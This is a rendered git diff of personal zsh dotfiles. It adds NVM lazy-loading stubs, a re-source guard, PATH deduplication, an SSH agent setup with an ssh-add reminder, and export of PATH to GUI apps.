@ -59,3 +61,4 @@ if command -v bat &> /dev/null; then
|
|||
# export MANPAGER="sh -c 'col -bx | bat -l man -p'"
|
||||
export MANPAGER="sh -c 'sed -u -e \"s/\\x1B\[[0-9;]*m//g; s/.\\x08//g\" | bat -p -lman'"
|
||||
fi
|
||||
# Removed redundant PATH addition (already on line 50)
|
||||
|
|
|
|||
83
zsh/.zshrc
83
zsh/.zshrc
|
|
@ -1,3 +1,14 @@
|
|||
# Guard against re-sourcing (prevents slowdown on multiple sources)
|
||||
# But allow aliases and exports to be reloaded when manually sourced
|
||||
if [[ -n "$ZSHRC_LOADED" ]]; then
|
||||
# If manually sourcing (not initial shell startup), just reload configs
|
||||
[ -f ~/.aliases ] && source ~/.aliases
|
||||
[ -f ~/.exports ] && source ~/.exports
|
||||
return 0
|
||||
fi
|
||||
# Don't export - each shell instance should load fresh
|
||||
ZSHRC_LOADED=1
|
||||
|
||||
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
|
||||
# Initialization code that may require console input (password prompts, [y/n]
|
||||
# confirmations, etc.) must go above this block; everything else may go below.
|
||||
|
|
@ -123,9 +134,60 @@ source $HOME/.cargo/env
|
|||
# <<< conda initialize <<<
|
||||
|
||||
|
||||
# NVM Lazy Loading (saves ~400ms on shell startup)
|
||||
# Instead of loading NVM immediately, we create placeholder functions
|
||||
# that load NVM only when first used
|
||||
export NVM_DIR="$HOME/.nvm"
|
||||
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
|
||||
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
|
||||
|
||||
# Add NVM's default Node to PATH manually (fast)
|
||||
if [ -d "$NVM_DIR/versions/node" ]; then
|
||||
# Get the default/current Node version
|
||||
NVM_DEFAULT_NODE=$(find "$NVM_DIR/versions/node" -maxdepth 1 -type d | sort -V | tail -1)
|
||||
if [ -n "$NVM_DEFAULT_NODE" ]; then
|
||||
export PATH="$NVM_DEFAULT_NODE/bin:$PATH"
|
||||
fi
|
||||
fi
|
||||
|
||||
# Lazy load function - loads NVM on first use
|
||||
# One-shot NVM loader: remove the placeholder trampolines below so the
# real functions defined by nvm.sh win on the next lookup, then source
# NVM and its completion if they are present.
lazy_load_nvm() {
  local stub
  for stub in nvm node npm npx; do
    unset -f "$stub"
  done
  [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
  [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
}
|
||||
|
||||
# Create placeholder functions that trigger lazy loading
|
||||
# Trampoline stub: the first call loads NVM for real, then re-dispatches.
# lazy_load_nvm unsets this very function before sourcing nvm.sh, so the
# inner 'nvm "$@"' below resolves to the function nvm.sh just defined —
# the two statements must stay in exactly this order.
nvm() {
  lazy_load_nvm
  nvm "$@"
}
|
||||
|
||||
node() {
  # Use the node binary from PATH when present; otherwise load NVM first.
  # Bug fix: 'command -v node' also matches this function itself, so the
  # check always succeeded and the lazy-load branch was unreachable.
  # 'type -P' searches PATH only (executables), ignoring functions.
  if type -P node >/dev/null 2>&1; then
    command node "$@"
  else
    lazy_load_nvm
    node "$@"
  fi
}
|
||||
|
||||
npm() {
  # Use the npm binary from PATH when present; otherwise load NVM first.
  # Bug fix: 'command -v npm' matched this function itself, making the
  # lazy-load branch unreachable; 'type -P' restricts the lookup to PATH.
  if type -P npm >/dev/null 2>&1; then
    command npm "$@"
  else
    lazy_load_nvm
    npm "$@"
  fi
}
|
||||
|
||||
npx() {
  # Use the npx binary from PATH when present; otherwise load NVM first.
  # Bug fix: 'command -v npx' matched this function itself, making the
  # lazy-load branch unreachable; 'type -P' restricts the lookup to PATH.
  if type -P npx >/dev/null 2>&1; then
    command npx "$@"
  else
    lazy_load_nvm
    npx "$@"
  fi
}
|
||||
|
||||
|
||||
# Generated for pdtm. Do not edit.
|
||||
|
|
@ -141,3 +203,20 @@ export PATH=/home/e/.opencode/bin:$PATH
|
|||
# bun
|
||||
export BUN_INSTALL="$HOME/.bun"
|
||||
export PATH="$BUN_INSTALL/bin:$PATH"
|
||||
# Removed redundant .local/bin addition (already in ~/.exports)
|
||||
|
||||
# SSH Agent for persistent tunnel (Baserow, etc.)
|
||||
export SSH_AUTH_SOCK=/run/user/1000/ssh-agent.socket
|
||||
|
||||
# Reminder to add SSH key after reboot
|
||||
if ! ssh-add -l &>/dev/null; then
|
||||
echo "🔑 Reminder: Add your Vultr SSH key for blog automation:"
|
||||
echo " ssh-add ~/.ssh/id_ed25519_vultr"
|
||||
fi
|
||||
|
||||
# Deduplicate PATH at the end (after all PATH modifications)
|
||||
export PATH=$(echo "$PATH" | tr ':' '\n' | awk '!seen[$0]++' | paste -sd:)
|
||||
|
||||
# Make PATH available to GUI applications (Ulauncher, etc.)
|
||||
# This ensures apps launched outside terminal sessions can find bun, custom bins, etc.
|
||||
systemctl --user import-environment PATH
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue